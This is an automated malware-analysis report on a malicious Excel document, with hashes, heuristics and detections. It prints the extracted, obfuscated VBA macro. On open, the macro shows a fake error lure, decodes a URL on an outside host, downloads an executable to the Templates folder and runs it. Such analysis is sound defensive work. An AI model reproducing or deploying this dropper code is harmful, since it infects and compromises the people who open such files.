Office (OLE) malware analysis — malicious · e88900700b8982b5

MALICIOUS

Office (OLE)

93.0 KB Created: 2020-01-23 05:36:40 Authoring application: Microsoft Excel First seen: 2020-05-25

MD5: fd2e98ae762daaa9b265a4f717f19495 SHA-1: 52c72a606fce7d9d49f58631031c08f763999e1c SHA-256: e88900700b8982b5bf8723d4737be690cee06ec427c997e3bac2c1aa442179a5

348 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The critical OLE_VBA_WSCRIPT and OLE_VBA_HTTP_DROP_EXEC heuristics indicate that the VBA macro uses WScript.Shell to download and execute a second-stage payload. The Workbook_Open macro is designed to display a fake error message to the user, likely as a lure to enable content. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 9

ClamAV: Xls.Dropper.Agent-7559029-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7559029-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© = £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12195 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12195 bytes
SHA-256: `2ea3c4ba976357fc896208adfa7ab1e592734f0b65e1d4dc7a739672e99cc541`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub winOrigin() End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim ¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ As Integer ¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ = Chr(50) + Chr(48) + Chr(48) Dim WshShell As Object Dim SpecialPath As String Set WshShell = CreateObject("WScript.Shell") SpecialPath = WshShell.SpecialFolders("Templates") Dim ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿ Dim ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© Dim £¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º Dim ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨» Dim ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£« Dim «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« As Integer Dim £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯© Dim ¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶© «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« = 1 Range("A1").Value = "Windows cannot open this image on this computer" MsgBox "Windows cannot open this image on this computer" Set £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯© = CreateObject("microsoft.xmlhttp") Set ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£« = CreateObject("Shell.Application") ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨» = SpecialPath + ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("\¶¶ØRKGK¥.ÂÛÂ") £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Open "get", ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("hÖÖÓÕ://ÖhÂmÂÖÀlÒÃÃÄÁÂmÂÀlÕ.ÁÒm.Ól/hÒÒkÂÔ/bÙÄld_Fâ0².ÂÛÂ"), False £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.send ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© = £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.responseBody If £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Status = 200 Then Set ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿ = CreateObject("adodb.stream") ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Open ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Type = «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Write ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.SaveToFile ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨», «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Close End If ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«.Open (©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨») End Sub Public Function ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ) ¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼ = " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§² = " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" For i = 1 To Len(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ) ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º = InStr(¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼, Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1)) If ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º > 0 Then «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª = Mid(´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§², ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º, 1) ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª Else ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1) End If Next ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢ = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 2ea3c4ba976357fc896208adfa7ab1e592734f0b65e1d4dc7a739672e99cc541

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub winOrigin()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim ¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ As Integer
¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ = Chr(50) + Chr(48) + Chr(48)
  Dim WshShell As Object
    Dim SpecialPath As String

    Set WshShell = CreateObject("WScript.Shell")
    SpecialPath = WshShell.SpecialFolders("Templates")
Dim ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿
Dim ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©
Dim £¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º
Dim ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»
Dim ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«
Dim «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« As Integer
Dim £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©
Dim ¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©
«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« = 1

Range("A1").Value = "Windows cannot open this image on this computer"
MsgBox "Windows cannot open this image on this computer"

Set £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯© = CreateObject("microsoft.xmlhttp")
Set ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£« = CreateObject("Shell.Application")

©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨» = SpecialPath + ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("\¶¶ØRKGK¥.ÂÛÂ")
£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Open "get", ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("hÖÖÓÕ://ÖhÂmÂÖÀlÒÃÃÄÁÂmÂÀlÕ.ÁÒm.Ól/hÒÒkÂÔ/bÙÄld_Fâ0².ÂÛÂ"), False
£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.send
¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© = £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.responseBody
If £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Status = 200 Then
Set ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿ = CreateObject("adodb.stream")
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Open
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Type = «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Write ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.SaveToFile ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨», «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««
